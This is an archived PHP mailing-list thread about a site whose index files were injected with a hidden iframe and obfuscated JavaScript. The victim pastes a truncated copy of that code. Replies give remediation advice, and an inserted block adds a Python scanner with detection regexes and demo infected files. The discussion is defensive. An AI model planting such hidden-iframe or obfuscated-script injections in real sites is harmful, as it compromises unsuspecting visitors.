
Re: [phpXperts] Site Hacking....

  • 9el
    Message 1 of 16 , Apr 4 8:02 AM
      Another nice link about SQL injections :
      http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

      On Sat, Apr 4, 2009 at 8:55 PM, 9el <lenin@...> wrote:
      > This is kind of CSRF and code injection. The hacker/cracker is
      > injecting PHP/server-side code, which is executing and rewriting with
      > the server's own permission.
      >
      > Data must be sanitized before input/output. All exec, passthru and
      > other shell permissions should be taken care of. www.phpsec.org
      > and also follow Shiflett's book on PHP Security.
      > Another thing is important: if the hacker/cracker is trying to flood
      > with a million requests there should also be protection to stop that,
      > otherwise it would be a Denial of Service case for the Web App. And
      > during a DoS situation security vulnerabilities and holes are revealed more.
      >
      > Regards
      >
      > Lenin
      >
      > www.twitter.com/nine_L
      >
    • 9el
      Message 2 of 16 , Apr 4 10:00 AM
        On Sat, Apr 4, 2009 at 10:40 PM, Md. Nahid <nahidphpxpert@...> wrote:
        > Hi,
        > Thanks for replying with more solutions. Now I am telling about my problem.
        > I have developed a static site and hosted it 90 days ago. Today in the morning I
        > tried to search for my site on Google. But Google shows "This site may harm your
        > computer". After clicking the link it shows "Warning - visiting this
        > web site may harm your computer!"
        >
        > At the same time I opened my FTP and checked all files, and I saw only
        > the index.php, main.htm, index.html and home.html files are infected.
        >
        > This is my previous code:
        > <?
        > include 'header.php';
        > ?>
        > ……………. My Html Code
        >
        > <?
        > include 'footer.php';
        > ?>
        >
        > Now auto modify code:
        >
        > <?
        > include 'header.php';
        > ?>
        > ……………. My Html Code
        >
        > <?
        > include 'footer.php';
        > echo "";
        > ?>
        > http://url/</a>' width='1' height='1'
        > style='visibility: hidden;'> return
        > (eval('pars'+'eInt')(q49d5f45029aa7,16));}function
        > q49d5f4502b218(q49d5f4502b9ea){ var q49d5f4502d156=2; var
        > q49d5f4502c1b6='';q49d5f4502e0f9=String['fromCharCode'];for(q49d5f4502c986=0;q49d5f4502c986<q49d5f4502b9ea.length;q49d5f4502c986+=q49d5f4502d156){
        > q49d5f4502c1b6+=(q49d5f4502e0f9(c1023895d9q49d5f450292d8(q49d5f4502b9ea.substr(q49d5f4502c986,q49d5f4502d156))));}return
        > q49d5f4502c1b6;} var n45='';var
        > ............ moderated ....................
        > </script>
        >
        > This is my actual problem. I have removed this code. I cannot
        > understand who put this additional code. Any hacker?
        >
        > Now please tell me how to protect my site.
        >
        > --------------
        > golam robbany
        >
        I have already told you what to do.
        1. Filter Input and Output both.
        2. Sanitize and Validate data.
        3. Try to learn a good framework which has those basic security measures already implemented. But you should also adapt them yourself.
        4. If the site is about sophisticated data then you can consider using a VPS or Dedicated hosting.
        5. Do not forget to study about the Security vulnerabilities. Try to collect the ZCE Exam preparation Guide and read it.
        Also recommended is www.phpseq.org
        Don't forget to Google on:
        CSRF
        XSS
        SQLInjection
        CodeInjection
        ClickJacking
        SessionHijacking
        EmailInjection


        Top 10 Home Office Hacks http://tinyurl.com/cps5ay

        And of course: super-secure your domain + FTP + control panel + mail etc. with hard passwords and difficult-to-guess usernames as well.

      • Nurul Abser
        Message 3 of 16 , Apr 4 8:46 PM
          @9el
          *  Can Codeigniter prevent this kind of attack?
          * In the config/database.php file I set db_debug to FALSE because it may also create a security problem by showing SQL information at debugging time.
          * Is there any change needed to secure the application?


          --
          Nurul Abser
          abser-bd.blogspot.com
        • 9el
          Message 4 of 16 , Apr 4 10:41 PM

            On Sun, Apr 5, 2009 at 9:46 AM, Nurul Abser
            @9el
            *  Can Codeigniter prevent this kind of attack?
            * In the config/database.php file I set db_debug to FALSE because it may also create a security problem by showing SQL information at debugging time.
            * Is there any change needed to secure the application?

            Well, hacking is breaking the security. And destruction is easier than creation. When you enable the highest measures of security in any framework-based application you can just expect a minimal level of security automatically, but it is not guaranteed for sure.

            And not only db_debug: all sorts of debug information should be out of sight of the end users/hackers. Use debugging/logging to files.
            db_debug is an initial option; you never keep it enabled in production.

            To fool-proof your CI application you must consult lots of proven tricks and experienced programmers.

            Thanks

            Lenin

            www.twitter.com/nine_L
          • Sabrina Akter
            Message 5 of 16 , Apr 7 7:33 PM
              Nurul Abser: if you use 'Codeigniter' library functions, that will decrease your risk. But still, you have to be alert while writing queries, especially while writing a SELECT query. Most people write
              "SELECT * from TABLE_NAME". It's really a bad habit. Please avoid [ * ] (select all). This simple [ * ] may cost you a lot.

              With Regards
              --------------------
              Sabrina Akter  
              Web App. Developer
              'IBACS' - www.ibacs.co.uk


            • Nurul Abser
              Message 6 of 16 , Apr 7 11:10 PM
                Thanks to Lenin and Sabrina. Do you have any link where I can read about the security hole in Codeigniter?

                --
                Nurul Abser
                abser-bd.blogspot.com
              • 9el
                Message 7 of 16 , Apr 7 11:38 PM
                  On Wed, Apr 8, 2009 at 12:10 PM, Nurul Abser <abser.it@gmail.com> wrote:
                  > Thanks to Lenin and Sabrina. Do you have any link where I can read about the
                  > security hole in Codeigniter.
                  >

                  http://www.google.com.bd/search?hl=bn&client=firefox-a&rls=com.ubuntu%3Aen-US%3Aunofficial&hs=4BR&q=security+holes+in+codeigniter&btnG=%E0%A6%85%E0%A6%A8%E0%A7%81%E0%A6%B8%E0%A6%A8%E0%A7%8D%E0%A6%A7%E0%A6%BE%E0%A6%A8&meta=&aq=f&oq=

                  http://xtrafile.com/2008/09/10/using-codeigniter-to-build-web-20-apps-part-one-security/
                  is the one that comes at the top.

                  Now, my thinking is, as a starter you should be looking to avoid the worst practices first. And by learning all the current mal-usage of the internet, you can start practicing ways to avoid them or at least make your apps a bit safer than usual.

                  regards

                  Lenin

                  www.twitter.com/nine_L
                • Humayun Kabir
                  Message 8 of 16 , Apr 12 10:48 PM
                    Some days ago I faced the same problem in one of my projects. The client of the project was very anxious about the unwanted iframe code on the index.php page of his main site. My project was hosted on the same hosting server and I have access to that server. My client claimed I had uploaded the virus/iframe code to his index.php script, because I have access to that server. But in fact I didn't know anything about the iframe code. Then I searched online and found the reason for the code and also got a solution. Please see the article below. All web programmers who are facing this problem may get help from this article.

                    1) Actually the html/frame viruses originate from a client-side PC that has not properly run a virus scan. What happens is there is a virus on a client PC, and when that PC uses an FTP client (like FileZilla, etc.), the virus "sniffs" the FTP session, gets the username and password, and later will initiate a hidden FTP session, then download any index.html, index.php, default.php, etc. files, and add an <iframe> tag to the bottom of the file (or an echo"<iframe....).
                    When customers browse this site their anti-virus software displays a warning! This is not good for business. There are 4 steps I want you to do during your shift to fix this problem:

                        1a) Install Avira anti-virus software (free version works great). It's a very light (not resource-intensive) AV software that is one of the best. Make sure that the auto-updater is kept on, so that every few days the AV virus detection DB gets updated (small, very quick automatic process).

                        2a) Change all FTP passwords. This step is only to be done after step (1a) is complete, to completely ensure the virus does not get the new passwords.

                        3a) Make sure the chmod is set correctly and there are no chmod 777 set on any of the servers. (I think this is not the problem, as I think the default is always 755 for Linux... and the Windows IIS server, I'm not sure.)

                        4a) After 1a, 2a, 3a are all complete, make sure when browsing the sites they are working on, they may see Avira pop up with a warning that the html/php etc. file contains an html/framer script/virus. This means that index.html, index.php, default.php, index.aspx (and maybe a few other files) contain an added <iframe> found at the bottom, or an echo"<iframe...." found at the bottom of the file. This needs to be deleted, or the virus warning will keep appearing every time the site is browsed.

                    --- On Sat, 4/4/09, Md. Nahid <nahidphpxpert@...> wrote:
                    From: Md. Nahid <nahidphpxpert@...>
                    Subject: [phpXperts] Site Hacking....
                    To: "PHPXpert" <phpexperts@yahoogroups.com>
                    Date: Saturday, April 4, 2009, 3:11 AM



                    Dear All,

                     

                    Today I am facing a problem with a site. I hosted it around 90 days ago.

                    Today when I open my site it shows that the site does not open, and I found some code in my index file.

                     


                     

                    I am not including this code. but who put this code? any hacker?

                     

                    Someone help me?


                     
                    ------------ --
                    golam robbany
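
A defender-side check for steps 3a and 4a above, added here as an example (it is not part of any post in this thread): it walks a web root, looks only at the default documents named in the thread, and flags world-writable files and the injected patterns quoted above. The regexes, the file-name set and the sample files (including the example.invalid URL) are constructed assumptions.

```python
import os
import re
import stat
import tempfile

# Default documents the thread reports as modified (assumed list, extend as needed).
TARGET_NAMES = {"index.php", "index.html", "index.htm", "main.htm",
                "home.html", "default.php", "index.aspx"}

# Heuristics modelled on the injected code quoted in this thread.
SIGNATURES = {
    # <iframe> that is 0/1 px in size or hidden by CSS
    "hidden_iframe": re.compile(
        r"<iframe\b[^>]*?(?:(?:width|height)\s*=\s*\\?['\"]?[01]\b"
        r"|visibility\s*:\s*hidden|display\s*:\s*none)", re.I | re.S),
    # eval('pars'+'eInt'): a function name split to dodge string searches
    "split_eval": re.compile(
        r"eval\s*\(\s*['\"]\w+['\"]\s*\+\s*['\"]\w+['\"]", re.I),
    # String['fromCharCode'] instead of String.fromCharCode
    "bracket_fromcharcode": re.compile(
        r"String\s*\[\s*['\"]fromCharCode['\"]\s*\]", re.I),
    # PHP variant: echo "<iframe ...
    "echo_iframe": re.compile(r"echo\s*['\"]\s*<iframe", re.I),
}


def tail_after_html(text):
    """Return whatever follows the last </html>, where appended code lands."""
    idx = text.lower().rfind("</html>")
    return text[idx + len("</html>"):] if idx != -1 else ""


def scan_file(path):
    """Return the list of finding names for one file (empty list = clean)."""
    findings = []
    if os.stat(path).st_mode & stat.S_IWOTH:      # step 3a: e.g. chmod 777
        findings.append("world_writable")
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    for name, rx in SIGNATURES.items():           # step 4a: injected markup
        if rx.search(text):
            findings.append(name)
    if re.search(r"<(?:script|iframe)\b", tail_after_html(text), re.I):
        findings.append("markup_after_closing_html")
    return findings


def scan_webroot(root):
    """Map relative path -> findings for every flagged default document."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower() in TARGET_NAMES:
                path = os.path.join(dirpath, fname)
                found = scan_file(path)
                if found:
                    report[os.path.relpath(path, root)] = found
    return report


def _write(root, rel, text, mode):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)
    os.chmod(path, mode)


def build_demo_webroot():
    """Create a temporary web root with constructed sample files."""
    root = tempfile.mkdtemp(prefix="webroot_")
    _write(root, "index.html",
           "<html><body><h1>Welcome</h1></body></html>\n", 0o644)
    # Constructed sample: PHP page with the echo "<iframe ..." variant.
    _write(root, os.path.join("shop", "index.php"), """<?
include 'header.php';
?>
<p>My Html Code</p>
<?
include 'footer.php';
echo "<iframe src='http://example.invalid/' width='1' height='1' style='visibility: hidden;'></iframe>";
?>
""", 0o644)
    # Constructed sample: script appended after </html>, file left chmod 777.
    _write(root, "home.html", """<html><body>Home</body></html>
<script>function d(h){return (eval('pars'+'eInt')(h,16));}
var f=String['fromCharCode'];</script>
""", 0o777)
    return root


if __name__ == "__main__":
    for rel, found in sorted(scan_webroot(build_demo_webroot()).items()):
        print(rel, "->", ", ".join(found))
```

A hit only says the file needs to be inspected and restored from a known-good copy; a clean result does not prove the site is clean, since the patterns cover only the variants quoted in this thread.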





                  • M. A. Taleb
                    Message 9 of 16 , Apr 13 6:40 AM
                      Appreciate man for your good solution
                       
                      Regards
                      M. A. Taleb





                    • anam kafi
                      Message 10 of 16 , Apr 13 11:44 AM
                        Hi,
                        I have got the same problem in a couple of sites. I just deleted all files from the server and ran anti-virus on my PC. Then uploaded the site. Now it is OK. I didn't know how the virus works but from this article now I have that idea. Thank you for this great article.
                         
                        Regards
                        Anam
